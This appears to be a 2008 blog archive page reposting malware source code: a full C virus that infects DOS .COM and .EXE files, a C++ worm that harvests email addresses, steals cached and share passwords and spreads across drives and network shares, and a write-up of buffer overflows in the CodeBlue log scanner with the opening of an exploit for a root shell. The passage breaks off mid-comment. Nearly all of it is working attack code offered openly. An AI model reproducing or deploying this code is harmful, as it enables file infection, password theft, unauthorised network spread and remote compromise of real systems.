techian.com

A Blog With No Limits

Advertisement

Archive for October, 2008

A generic or .com and .exe infector in C

Posted on October 10, 2008 by admin | No Comments

 /* C-Virus:  A generic .COM and .EXE infector

   Written by Nowhere Man

   Project started and completed on 6-24-91

   Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too)
*/

[to protect the code from script kiddies.. header files are not given]

#pragma inline                              // Compile to .ASM

#include
#include
#include
#include
#include

void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);

 #define DEBUG
#define ONE_KAY   1024                      // 1k
#define TOO_SMALL ((6 * ONE_KAY) + 300)               // 6k+ size minimum
#define SIGNATURE “NMAN”                    // Sign of infection

int main(void)
{
    /* The main program */

    spread(_argv[0], victim());             // Perform infection
    small_print(“Out of memory\r\n”);       // Print phony error
    return(1);                         // Fake failure…
}

void hostile_activity(void)
{
    /* Put whatever you feel like doing here…I chose to
       make this part harmless, but if you’re feeling
       nasty, go ahead and have some fun… */

    small_print(“\a\a\aAll files infected.  Mission complete.\r\n”);
    exit(2);
}

int infected(char *fname)
{
    /* This function determines if fname is infected */

    FILE *fp;                     // File handle
    char sig[5];                       // Virus signature

    fp = fopen(fname, “rb”);
    fseek(fp, 28L, SEEK_SET);
    fread(sig, sizeof(sig) – 1, 1, fp);
#ifdef DEBUG
    printf(“Signature for %s:  %s\n”, fname, sig);
#endif
    fclose(fp);
    return(strncmp(sig, SIGNATURE, sizeof(sig) – 1) == 0);
}

void small_print(char *string)
{
    /* This function is a small, quick print routine */

    asm {
         push si
         mov  si,string
         mov  ah,0xE
    }

print:   asm {
         lodsb
         or   al,al
         je   finish
         int  0×10
         jmp  short print
    }
finish: asm   pop  si
}

void spread(char *old_name, char *new_name)
{
    /* This function infects new_name with old_name */

    /* Variable declarations */

    FILE *old, *new;                   // File handles
    struct ftime file_time;                         // Old file date,
time
    int attrib;                        // Old attributes
    long old_size, virus_size;              // Sizes of files
    char *virus_code = NULL;           // Pointer to virus
    int old_handle, new_handle;             // Handles for files

    /* Perform the infection */

#ifdef DEBUG
    printf(“Infecting %s with %s…\n”, new_name, old_name);
#endif
    old = fopen(old_name, “rb”);            // Open virus
    new = fopen(new_name, “rb”);            // Open victim
    old_handle = fileno(old);               // Get file handles
    new_handle = fileno(new);
    old_size = filelength(new_handle);      // Get old file size
    virus_size = filelength(old_handle);         // Get virus size
    attrib = _chmod(new_name, 0);           // Get old attributes
    getftime(new_handle, &file_time);       // Get old file time
    fclose(new);                       // Close the virusee
    _chmod(new_name, 1, 0);                 // Clear any read-only
    unlink(new_name);                  // Erase old file
    new = fopen(new_name, “wb”);            // Open new virus
    new_handle = fileno(new);
    virus_code = malloc(virus_size);        // Allocate space
    fread(virus_code, virus_size, 1, old);       // Read virus from old
    fwrite(virus_code, virus_size, 1, new);         // Copy virus to new
    _chmod(new_name, 1, attrib);            // Replace attributes
    chsize(new_handle, old_size);           // Replace old size
    setftime(new_handle, &file_time);       // Replace old time

    /* Clean up */

    fcloseall();                       // Close files
    free(virus_code);                  // Free memory
}

char *victim(void)
{
    /* This function returns the virus’s next victim */

    /* Variable declarations */

    char *types[] = {“*.EXE”, “*.COM”};          // Potential victims
    static struct ffblk ffblk;              // DOS file block
    int done;                     // Indicates finish
    int index;                         // Used for loop

    /* Find our victim */

    if ((_argc > 1) && (fopen(_argv[1], “rb”) != NULL))
         return(_argv[1]);

    for (index = 0; index < sizeof(types); index++) {
         done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
         while (!done) {
#ifdef DEBUG
              printf(“Scanning %s…\n”, ffblk.ff_name);
#endif
              /* If you want to check for specific days of the week,
                 months, etc., here is the place to insert the
                 code (don’t forget to “#include “!) */

              if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
                   return(ffblk.ff_name);
              done = findnext(&ffblk);
         }
    }

    /* If there are no files left to infect, have a little fun… */

    hostile_activity();
    return(0);                         // Prevents warning
}

A worm in cpp

Posted on October 10, 2008 by admin | No Comments

// —[ w0rm.cpp ]—————————–[ http://harmony.haxors.com ]–//
//
// An exploration into remote network propogation using multiple techniques.
// The w0rm will spread via e-mail (MAPI) all local drives and any writable
// network shares. It collects passwords on the local system to be used in
// cracking any password protected shares on the network. It will write an
// Autorun.inf file in the root of any drives it can so when you open that
// drive, e.g. double click it the w0rm will execute and go resident :) .
// This code is obviously buggy and not intended to be actually used in the
// ‘real’ world. To determine if the payload should be deployed the w0rm
// sits on the network and plays a ‘game’ with other w0rms on that network
// segment via broadcast UDP messages. see relevant source for a proper
// idea of the ‘game’, its just a perverse example of too much time on ones
// hands :) . this is version 1.00 so the are bugs, incompatabilities with
// various flavors of windows and other anomolies – dose! but if you want
// something better write it yourself ;) (and send me a copy)
//
//               “this is the end, beautiful friend” – the doors
//
// —[ harmony :: temple of the screaming interrupt ]–[ nomelody@gmx.net ]–//

//–header-files————————————————————–//
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <io.h>
#include <dos.h>

#include <conio.h>
//–defines——————————————————————-//
#define MAX_LENGTH          128
#define MAX_RECIEVERS       50
#define MUTEX_NAME          “w0rm”
#define EARTH_WORM_JIM      “Readme.exe”

#define WORMGAME_PORT       12345
#define WORMGAME_MAX_WINS   10
#define WORMGAME_PKT_PLAY   0xFF
#define WORMGAME_PKT_WIN    0×80
//–globals——————————————————————-//
char *ptrEgo, *buf;
char addressList[MAX_RECIEVERS][MAX_LENGTH], passwordList[50][MAX_LENGTH];
int index = 0;

typedef struct tagPASSWORD_CACHE_ENTRY {
    WORD cbEntry;
    WORD cbResource;
    WORD cbPassword;
    BYTE iEntry;
    BYTE nType;
    BYTE abResource[1];
} PASSWORD_CACHE_ENTRY;

typedef struct WormGamePkt {
    BYTE pktType;
    int pktNum;
} AWORMGAMEPACKET;
//–function-declarations—————————————————–//
DWORD WINAPI WormGameThread( LPVOID );
DWORD WINAPI WormMainThread( LPVOID );

BOOL runningNT();
void propogateMAPI( void );
int initMAPI( void );
int validAddress( char * addr );
int sendMessage( int recipNum, LHANDLE lhSession );
int getSharePasswords( void );
int getCachedPasswords( void );
int addPassword( char * pwd );
void propogateDrive( void );
void attackDrive( char * drive, int type );
void propogateNet( LPNETRESOURCE lpnr );
int crackNetShare( char * share );
void releasePayload();

extern “C” int __stdcall RegisterServiceProcess( int dwProcessID, int dwType );
//–entry-point—————————————————————//
// WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
int main( int argc, char **argv )
{
        HANDLE hMutex, hEgo, hWormGameThread, hWormMainThread;
        DWORD WormGameThreadId, WormMainThreadId;

        // display explorer window if we need to, due to autorun.inf file :)
        // test for any command line…

        /* only allow one instance of worm to run on system at one time */
        hMutex = CreateMutex( NULL, TRUE, MUTEX_NAME);
            if(  GetLastError() == ERROR_ALREADY_EXISTS )
            {
                ExitProcess( 0 );
            }

        ptrEgo = argv[0];

        /* try to ‘hide’ the process */
            if( runningNT() == TRUE )
            {
                // hide process in winNT
                printf(“WORM running on WinNT\n”);
            } else {
                printf(“WORM running on Win9x\n”);
                LoadLibrary( “KERNAL32.DLL” );
                RegisterServiceProcess( NULL, 1);
            }

        /* go resident and give worm RAW power */
        hEgo = GetCurrentProcess();
        SetPriorityClass( hEgo, HIGH_PRIORITY_CLASS);

        // create suspended WormMainThread…
        hWormMainThread = CreateThread( NULL, 0, WormMainThread, 0, CREATE_SUSPENDED, &WormMainThreadId);
            if( hWormMainThread != NULL )
            {
                // set thread to time critical… ‘i wana take you higher’ – sly and the family stone
                //SetThreadPriority( hWormMainThread, THREAD_PRIORITY_TIME_CRITICAL);
                // resume thread execution…
                ResumeThread( hWormMainThread );
            }
 /*
        // create suspended WormGameThread…
        hWormGameThread = CreateThread( NULL, 0, WormGameThread, 0, CREATE_SUSPENDED, &WormGameThreadId);
            if( hWormGameThread != NULL )
            {
                // resume thread execution…
                ResumeThread( hWormGameThread );
            }                                         
                                                       */
        /* wait for hWormGameThread() to terminate */
     //   WaitForSingleObject( hWormGameThread, INFINITE);
        WaitForSingleObject( hWormMainThread, INFINITE);

        printf(“MAIN_DEBUG: worm threads ended, im outa here: press a key…\n”);
        getch();

        /* release our mutex, next local worm wont get blocked */
            if( hMutex != NULL )
            {
                ReleaseMutex( hMutex );
            }
        return 0;
}

//—————————————————————————-//
DWORD WINAPI WormMainThread( LPVOID )
{
        DWORD dwSize;
        char buff[64];
        printf(“WormMainThread: started…\n”);
        /* spread worm via MAPI */
        propogateMAPI();
        /* get any passwords we can for use later on */
        getSharePasswords();
        getCachedPasswords();
        dwSize = 64;
        WNetGetUser( NULL, buff, &dwSize );
        addPassword( buff );
        printf(“DEBUG: total pwds got = %d\n”, index);
        /* spread worm via any/all localy maped drives */
        propogateDrive();
        /* spread worm via any/all LAN network shares */
        propogateNet( NULL );
        /* finished our little game :) */
        ExitThread( 0 );
        return 0;
}
//—————————————————————————-//
DWORD WINAPI WormGameThread( LPVOID )
{

        WSADATA w;
        SOCKET s_recv, s_send;
        sockaddr_in saddr, saddr_in, saddr_out;
        int size = sizeof( struct sockaddr ), totalwins = 0, magicWorm = 0, optval;
        AWORMGAMEPACKET gamePkt;
        fd_set fd_read;
        struct timeval timeout = { 5, 0 };

            if( WSAStartup( MAKEWORD(1,0), &w) != 0 )
            {
                printf(“WormThread: WSAStartup failed\n”);
                goto endThread;
            }

        s_recv = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        s_send = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP);
            if( s_recv == INVALID_SOCKET || s_send == INVALID_SOCKET )
            {
                printf(“WormThread: invalid socket\n”);
                goto endThread;
            }

        memset( &saddr_in, 0×00, sizeof( struct sockaddr));

        memset( &saddr, 0×00, sizeof( struct sockaddr));
        saddr.sin_family = AF_INET;
        saddr.sin_port = htons( WORMGAME_PORT );
        saddr.sin_addr.s_addr = INADDR_ANY;

        memset( &saddr_out, 0×00, sizeof( struct sockaddr) );
        saddr_out.sin_family = AF_INET;
        saddr_out.sin_port = htons( WORMGAME_PORT );
        saddr_out.sin_addr.s_addr = INADDR_BROADCAST;

        optval = 1;
            if( setsockopt( s_send, SOL_SOCKET, SO_BROADCAST , (char*)&optval, sizeof( int) ) == SOCKET_ERROR )
            {
                printf(“WormThread: setsocketopt failed\n”);
                goto endThread;
            }

            if( bind( s_recv, (struct sockaddr*)&saddr, sizeof( struct sockaddr)) == SOCKET_ERROR )
            {
                printf(“WormThread: bind failed\n”);
                goto endThread;
            }

        FD_ZERO( &fd_read );
        FD_SET( s_recv, &fd_read );
        randomize();
loop:
        while( 1 )
        {
               if( totalwins >= WORMGAME_MAX_WINS )
                {
                    releasePayload();
                    totalwins = 0;
                }
            // pick a magic number…
            magicWorm = ( ( rand() % 100 ) + 1 );
            printf(“WormThread: picked a magic num: %d\n”, magicWorm);
            // wait a length of time…
            Sleep( 500 );
            // send my magic number…
            gamePkt.pktType = WORMGAME_PKT_PLAY;
            gamePkt.pktNum = magicWorm;
                if( sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size) == SOCKET_ERROR )
                {
                    printf(“WormThread: sendto failed\n”);
                    break;
                }

            // handel responces…
                while( select( 0, &fd_read, NULL, NULL, &timeout) != SOCKET_ERROR )
                {
                    if( recvfrom( s_recv, (char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_in, &size) == SOCKET_ERROR )
                    {
                        printf(“WormThread: recvfrom failed\n”);
                        break;
                    } else {
                        switch( gamePkt.pktType )
                        {
                            case WORMGAME_PKT_PLAY: // recieved a magic number…
                                // ignore responce from local machine…
                                printf(“WormThread: recieved a magic num: %d\n”, gamePkt.pktNum);
                                // process other responces
                                    if( gamePkt.pktNum == magicWorm )
                                    {
                                        // notify any winners
                                        gamePkt.pktType = WORMGAME_PKT_WIN;
                                        saddr_out.sin_addr.s_addr = saddr_in.sin_addr.s_addr;
                                        sendto( s_send, (const char*)&gamePkt, sizeof( struct WormGamePkt ), 0, (struct sockaddr*)&saddr_out, size);
                                        saddr_out.sin_addr.s_addr = INADDR_BROADCAST;
                                    }
                                break;
                            case WORMGAME_PKT_WIN: // im a winner :)
                                printf(“WormThread: IM A WINNER!!!\n”);
                                totalwins++;
                                goto loop;
                            default:   // its all gone bugfuck!
                                printf(“WormThread: its all gone bugfuck!\n”);
                                break;
                        }
                    }
                } // while(select…
        }
endThread:
        closesocket( s_recv );
        closesocket( s_send );
        ExitThread( 0 );
        return 0;
}
//—————————————————————————-//
BOOL runningNT()
{
        OSVERSIONINFO osvi;
        BOOL retval = FALSE;

        osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
        GetVersionEx(&osvi);
            switch( osvi.dwPlatformId )
            {
                case VER_PLATFORM_WIN32_NT:
                    retval = TRUE;
                    break;
                case VER_PLATFORM_WIN32_WINDOWS:
                    retval = FALSE;
                    break;
                default: // VER_PLATFORM_LINUX ? :) || VER_PLATFORM_WIN32_ANOTHERBUGGYRELEASE
                    retval = FALSE;
                    break;
            }
        return retval;
}
//—————————————————————————-//
void propogateMAPI( void )
{
        LHANDLE lhSession;
        CHAR rgchMsgID[513];
        MapiMessage *lpMessage;
        int i=0;
            if( initMAPI() != 0 )
            {
                return;
            }
            if( MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
            {
                *rgchMsgID = NULL;
                    while( i < MAX_RECIEVERS )
                    {
                        if( MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
                        {
                            break;
                        }
                        if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
                        {
                    //    printf(“DOING: %s\n\t%s\n”,lpMessage->lpOriginator->lpszAddress,lpMessage->lpRecips->lpszAddress);
                            if( validAddress( lpMessage->lpOriginator->lpszAddress ) == 0 )
                            {
                                strcpy( addressList[i], lpMessage->lpOriginator->lpszAddress);
                                i++;
                            }
                            if( validAddress( lpMessage->lpRecips->lpszAddress  ) == 0 )
                            {
                                strcpy( addressList[i], lpMessage->lpRecips->lpszAddress);
                                i++;
                            }
                        }

                    }
                MAPIFreeBuffer( lpMessage );

                // TO DO: sort addressList and remove duplicates…

                //sendMessage( i, lhSession );    // <—- !!!!!!

                MAPILogoff( lhSession, 0L, 0L, 0L);
            }
            for( int x = 0 ; x < i ; x++ )
            {
                printf(“DEBUG: attacking:\t%s\n”, addressList[x]);
            }
        return;
}
//—————————————————————————-//
int initMAPI( void )
{
        HINSTANCE hi;
        LPMAPILOGON MAPILogon;
        LPMAPIFINDNEXT MAPIFindNext;
        LPMAPIREADMAIL MAPIReadMail;
        LPMAPISENDMAIL MAPISendMail;
        hi = LoadLibrary( “mapi32.dll” );
            if( hi == NULL )
            {
                return -1;
            }
        MAPILogon = (LPMAPILOGON)GetProcAddress( hi, “MAPILogon”);
        MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, “MAPIFindNext”);
        MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, “MAPIReadMail”);
        MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, “MAPISendMail”);
            if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || MAPISendMail == NULL )
            {
                return -1;
            }
        return 0;
}
//—————————————————————————-//
int validAddress( char * addr )
{
        if( strlen( addr ) >= MAX_LENGTH || strlen( addr ) == 0)
        {
            return -1;
        } else if( strchr( addr , ‘@’) == NULL )
        {
            return -1;
        } else if( strchr( addr , ‘.’) == NULL )
        {
            return -1;
        } else {
            return 0;
        }
}
//—————————————————————————-//
int sendMessage( int recipNum, LHANDLE lhSession )
{
        MapiRecipDesc *recips  = (MapiRecipDesc *)malloc( recipNum*sizeof(MapiRecipDesc) );
        MapiFileDesc attachment = { 0, 0, (ULONG)-1, ptrEgo, EARTH_WORM_JIM, NULL};
            for( int i=0 ; i<recipNum ; i++ )
            {
                recips[i].ulReserved   = 0;
                recips[i].ulRecipClass = MAPI_TO;
                recips[i].lpszName     = addressList[i];
                recips[i].lpszAddress  = addressList[i];
                recips[i].ulEIDSize    = 0;
                recips[i].lpEntryID    = NULL;
            }
        MapiMessage note = { 0, “The Subjext”, “The Message Text”, NULL, NULL, NULL, 0, NULL, recipNum, recips, 1, &attachment};
            if( MAPISendMail( lhSession, 0L, &note, 0L, 0L) != SUCCESS_SUCCESS )
            {
                return -1;
            }
        free( recips );
        return 0;
}
//—————————————————————————-//
int CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)
{
        memmove(buf, x->abResource+x->cbResource, x->cbPassword);
        buf[x->cbPassword] = 0;
        addPassword( buf );
        return 0;
}
//—————————————————————————-//
int getCachedPasswords( void )
{
        buf = new char[1024];
        HINSTANCE hi = LoadLibrary(“mpr.dll”);
            if( hi == NULL )
            {
                return -1;
            }
        WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) = (WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, “WNetEnumCachedPasswords”);
            if( enp == NULL )
            {
                return -1;
            }
        enp( 0, 0, 0xff, pce, 0);
        FreeLibrary( hi );
        return 0;
}
//—————————————————————————-//
BYTE rotr( BYTE b )
{
        BYTE carry;
        carry = b & 0×01;
        carry <<= 7;
        b >>= 1;
        b |= carry;
        return b;
}
//—————————————————————————-//
void decodePW( char * pw )
{
        BYTE hash = 0×35;
            while( pw && *pw )
            {
                *pw = *pw ^ hash;
                pw++;
                hash = rotr( hash );
            }
}
//—————————————————————————-//
int addPassword( char * pwd )
{
            if( (strlen(pwd) > 0) && (strlen(pwd) < MAX_LENGTH) )
            {
                strcpy( passwordList[ index ], pwd);
                printf(“DEBUG: ADDED: %s\n”, passwordList[ index ]);
                index++;
            }
        return 0;
}
//—————————————————————————-//
int getSharePasswords( void ){
        if( runningNT() == FALSE )
        {
            HKEY key, subkey;
            DWORD i, maxKeys, len, junk;
            char keyName[256], wrightPwd[256], readPwd[256];
            RegOpenKeyEx(HKEY_LOCAL_MACHINE, “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan”, 0, NULL, &key);
            RegQueryInfoKey (key, NULL, NULL, NULL, &maxKeys, NULL, NULL,NULL, NULL, NULL, NULL, NULL);
                if( maxKeys != 0 )
                {
                    for( i=0; i<maxKeys; i++ )
                    {
                        RegEnumKey(key, i, keyName, 256);
                        RegOpenKeyEx(key, keyName, 0, NULL, &subkey);
                        wrightPwd[0] = readPwd[0] = 0;

                        len = 256;
                        RegQueryValueEx(subkey, “Parm1enc”, NULL, &junk, (BYTE *)wrightPwd, &len);
                        wrightPwd[len] = 0;
                        decodePW(wrightPwd);
                        addPassword( wrightPwd );

                        len = 256;
                        RegQueryValueEx(subkey, “Parm2enc”, NULL, &junk, (BYTE *)readPwd, &len);
                        readPwd[len] = 0;
                        decodePW(readPwd);
                        addPassword( readPwd );
                    }
                }
            RegCloseKey(subkey);
            RegCloseKey(key);
        }
        return 0;
}
//—————————————————————————-//
void propogateDrive( void )
{
        int length;
        char buff[MAX_LENGTH], *ptr;

        ptr = buff;
        length = GetLogicalDriveStrings( MAX_LENGTH, ptr) ;

        if( length > 0 && length < MAX_LENGTH)
        {
            for( int i=0 ; i<=(length/4) ; i++ )
            {
                    switch( GetDriveType( ptr ) )
                    {
                        case DRIVE_FIXED:
                            // The drive is a local drive.
                            printf(“DRIVE_FIXED: %s\n”, ptr);
                            attackDrive( ptr, 1 );
                            break;
                        case DRIVE_REMOTE:
                            // The drive is a network drive.
                            printf(“DRIVE_REMOTE: %s\n”, ptr);
                            attackDrive( ptr, 1 );
                            break;
                        default:
                            break;
                    }
                *ptr+=1;
            }
        }
        return;
}
//—————————————————————————-//
void attackDrive( char * drive, int type )
{
        FILE *fpAutorun;
        char buff[MAX_LENGTH];
        // copy worm to drive, Attribute = hidden
            if( type == 1 )
            {
                sprintf( buff, “%s%s”, drive, EARTH_WORM_JIM);
            } else {
                sprintf( buff, “%s\\%s”, drive, EARTH_WORM_JIM);
            }
        printf(“DEBUG: propogateDrive: attacking %s\nATTACK REMOTE: %s\n”, drive, buff);
        /*    if( CopyFile( ptrEgo, buff, FALSE) == TRUE && type == 1 )
            {
                // create an Autorun.inf file on drive, Attribute = hidden
                sprintf( buff, “%sAutorun.inf”, drive);
                fpAutorun = fopen(buff, “w”);
                    if( fpAutorun != NULL )
                    {
                        fprintf( fpAutorun, “[Autorun]\nOPEN=%s\n”, EARTH_WORM_JIM);
                        fclose( fpAutorun );
                        _rtl_chmod(buff, 1, FA_HIDDEN | FA_RDONLY);
                    }
            }   */
        return;
}
//—————————————————————————-//
void propogateNet( LPNETRESOURCE lpnr )
{
        DWORD dwResult, dwResultEnum, cbBuffer = 16384, cEntries = 0xFFFFFFFF;
        HANDLE hEnum;
        LPNETRESOURCE lpnrLocal;
        dwResult = WNetOpenEnum( RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, lpnr, &hEnum);
            if( dwResult != NO_ERROR )
            {
                return;
            }
            do
            {
                lpnrLocal = (LPNETRESOURCE) GlobalAlloc(GPTR, cbBuffer);
                dwResultEnum = WNetEnumResource(hEnum, &cEntries, lpnrLocal, &cbBuffer);
                    if ( dwResultEnum == NO_ERROR )
                    {
                        for( DWORD i = 0; i < cEntries; i++ )
                        {
                                if( RESOURCEUSAGE_CONTAINER == ( lpnrLocal[i].dwUsage & RESOURCEUSAGE_CONTAINER ) )
                                {
                                    propogateNet( &lpnrLocal[i] );
                                } else if( RESOURCETYPE_DISK  == ( lpnrLocal[i].dwUsage & RESOURCETYPE_DISK ) )
                                {
                                    if( WNetAddConnection( lpnrLocal[ i ].lpRemoteName, NULL, NULL) == ERROR_INVALID_PASSWORD )
                                    {
                                        // try all found password/username combinations…
                                        printf(“ERROR_INVALID_PASSWORD “); printf(“ATTACKING: %s\n”,lpnrLocal[ i ].lpRemoteName );
                                            if( crackNetShare( lpnrLocal[ i ].lpRemoteName ) == 0 )
                                            {
                                                attackDrive( lpnrLocal[i].lpRemoteName, 0 );
                                                WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
                                            }
                                    } else {
                                        attackDrive( lpnrLocal[i].lpRemoteName, 0 );
                                        WNetCancelConnection( lpnrLocal[i].lpRemoteName, FALSE);
                                        printf(“ACCESS NOT DENIED “); printf(“ATTACKING: %s\n”,lpnrLocal[ i ].lpRemoteName );
                                    }
                                }
                        }
                    } else if( dwResultEnum != ERROR_NO_MORE_ITEMS ) {
                        break;
                    }
            } while( dwResultEnum != ERROR_NO_MORE_ITEMS );
        GlobalFree( (HGLOBAL) lpnrLocal );
        WNetCloseEnum( hEnum );
        return;
}
//—————————————————————————-//
int crackNetShare( char * share )
{
        int retval = 0;
            for( int i=0 ; i<index ; i++ )
            {
                retval = WNetAddConnection( share , passwordList[i], NULL );
                if( retval == NO_ERROR && retval != ERROR_INVALID_PASSWORD )   // <—– !!! dodgy testing, fix it
                {
                    printf(“PASS CRACKED: %s : %s\n”, share , passwordList[i]);
                    return 0;
                }
            }
        return -1;
}
//—————————————————————————-//
void releasePayload()
{
        printf(“\n\t!!! PAYLOAD !!!\n”);
        return;
}
//—————————————————————————-//

A

Code Blue v5.0 source

Posted on October 10, 2008 by admin | No Comments

CODE BLUE

$ cd codeblue
$ ls
CHANGES COPYING Makefile README codeblue.c
$ head COPYING
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc.
59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

Preamble

/* uh-oh */

$ vi codeblue.c
/*
* $Header: /usr/src/Projects/codeblue/codeblue.c,v 1.1 2001/08/02 20:40:01
* root Exp root $
*
******************************************************************************************
* -[ G O D B L E S S A M E R I C A ]-
*
******************************************************************************************
*
* CodeBlue v5.0 by Michael (mystic@tenebrous.com)
* This software is freely distributable under the terms of the GNU/GPL.
* Please see file ‘COPYING’

/* god bless america, AND mystical mike! */

….

/* line ~273 */
/*
* siginal_init:
* sets up all the signals we’d like
* to handle specially
*/
void signal_init(void)
{
struct sigaction sa_old, sa_new;

/* signal handling */
sa_new.sa_handler = signal_handler;
sigemptyset(&sa_new.sa_mask);
sa_new.sa_flags = 0;
sigaction(SIGINT, &sa_new, &sa_old);
sigaction(SIGPIPE, &sa_new, &sa_old);
}

/* shared signal handler doing all sorts of stuff, not very good mike :( */

/* line ~289 */

/*********************************************************************
* Our close() wrapper
*/
int Close(int sd)
{
return (close(sd));
}

/* that just made me laugh */

/* line ~661 */

char logline[512]; /* logline is global */

int scan_file(FILE * fp)
{
char buffer[1024];

….

fgets(buffer, 1024, fp);

….

if (found_infected == 1) { /* if it picks up a worm entry in the */
/* log this is true */

strcpy(logline, buffer);

/* oh dear */

/* line ~827 */

char reply[512]; /* global */
char whoispath[512] = “/usr/bin/whois”; /* global */

int main(int argc, char **argv)
{

…..

if (argv[i][0] == ‘-’)
switch (argv[i][1]) {
case ‘e’:{ /* return email address */
if ((!argv[i + 1]) || (argv[i + 1][0] == ‘-’))
DieWithRequire(argv[i]);
strcpy(reply, argv[i + 1]);
break;
}
case ‘p’:{ /* path to whois binary */
if ((!argv[i + 1]) || (argv[i + 1][0] == ‘-’))
DieWithRequire(argv[i]);
strcpy(whoispath, argv[i + 1]);
break;
}

/* whoops! */

Now, all this is good for a laugh, but unless its suid, not much use :(

CodeBlue will scan apache/squid logfiles looking for code red and nimda log
hits. If it finds a hit, it will connect to the source ip adress of the hit
and send an email warning of infection. Unfortunately, mystical mike was too
far up on his high horse to write something decent.

The function that does this is send_email() (line ~552)

It starts off like this:

int send_email(void)
{
int sd;
char *host = malloc(sizeof(char) * 512);

/* …. silly crap using popen and stuff …. */

/* host is the infected host from the logfiles
* this will connect to the host on port 25
*/

if ((sd = smtp_connect(host)) < SUCCESS)
return -1;

/* Step 0 – Get initial server response */
get_smtp_reply(sd);

/* this is the function of interest */

/* line ~345 */
/*********************************************************************
* fetches a reply from the SMTP server
*/
int get_smtp_reply(int sd)
{
char response[1024]; /* this is the remote host’s mail server buf */

….

/* props to dme!!! */

/*
* We’ll loop infinately, receiving
* 1 byte at a time until we receive a carriage return
* or line-feed character, signifying the end of the output
*/
/* GEE! THAT SOUNDS LIKE A GOOD IDEA MYSTICAL MIKE#@!#@! */

….

while (TRUE) {
if (select((sd + 1), &rset, NULL, NULL, &tv) < 0) {
if (errno != EINPROGRESS) {
fprintf(stderr, “[ ERROR: select() failed: %s\n",
strerror(errno));
return -1;
}
}
if (recv(sd, (int *) &response[i], 1, RECV_FL) < 0) { /* Hello */
if (errno == EAGAIN) {
if (elapsed >= smtp_timeout) {
fprintf(stderr, “[ ERROR: operation timed out\n");
fprintf(log, "..... ERROR: operation timed out\n");
return -1;
}
elapsed++;
usleep(smtp_timeout * 10000);
continue;
} else {
if (!(flags & FL_BEQUIET))
fprintf(stderr, "[ ERROR: recv() failed: %s\n",
strerror(errno));
fprintf(log, "..... ERROR: recv() failed: %s\n",
strerror(errno));
return -1;
}
}
if ((response[i] == ‘\n’)
|| ((response[i] == ‘\n’) && (response[i + 1] == ‘\n’)))
break;
i++; /* come here often baby? */
}

So slowly but surely, response is overrun, unless it its a newline.

/*
* hi, this is an exploit that doesnt work. it should be enough of a point in
* the right direction though. the overflow is in get_smtp_reply(), codeblue.c
* is pretty damn poor, there are more!!!
*
* being in a funny mood one afternoon, i made some software publicly
* available, the next morning i see this in my mailbox:
*
* ——- begin spouting off ——
* From mystic@tenebrous.com Mon Jul 22 19:50:46 2002
* Return-Path:
* Delivered-To: doe@orbital.wiretapped.net
* Received: (qmail 2711 invoked from network); 22 Jul 2002 19:50:45 -0000
* Received: from mail110.mail.bellsouth.net (HELO imf10bis.bellsouth.net)
* (205.152.58.50)
* by orbital.wiretapped.net with SMTP; 22 Jul 2002 19:50:45 -0000
* Received: from Michaels ([68.16.174.6]) by imf10bis.bellsouth.net
* (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
* id <20020722195143.XJOI21884.imf10bis.bellsouth.net@Michaels>
* for ; Mon, 22 Jul 2002 15:51:43 -0400
* From: “Michael”
* To: “‘Demi Sex God from Hell’”
* Subject: RE: ass the attack spoofing shell
* Date: Mon, 22 Jul 2002 15:50:13 -0400
* Message-ID: <000101c231b8$fedc7740$0200a8c0@Michaels>
* MIME-Version: 1.0
* Content-Type: text/plain;
* charset=”us-ascii”
* Content-Transfer-Encoding: 7bit
* X-Priority: 3 (Normal)
* X-MSMail-Priority: Normal
* X-Mailer: Microsoft Outlook, Build 10.0.2616
* Importance: Normal
* X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
* In-Reply-To:
* Status: RO
*
* Annoying. Pointless.
*
* ——- end spouting off ——-
*
* HOW RUDE!@##@!@#!
*
* so i had a visit to www.tenebrous.com, found some software written by this
* master coder, and here we are now. hehehe
*
* To use this against a webserver (A) using codeblue.
*
* $ printf “GET /scripts/root.exe\r\n\r\n” | nc A 80
*
* this will add an entry in the access log.
*
* ON THE SAME HOST:
*
* # ./mystic_anus 25
*
* wait a while.
*
* when codeblue runs it will pull your ip from the logs, connect to your port
* 25 and try to send you a mail. because mystic is an idiot, you will get a
* shell with the openbsd code!!!
*
* if codeblue is running nightly from roots crontab, you will get a
* rootshell!!!
*
* i like exclamation marks !!!!
*
* krad haxxor props: dedmunk (happy now#@!!#@) ph1ll1p, caddis, buo, solace,
* everyone on #cw , everyone in paris (you have a lovely city, i had a lovely
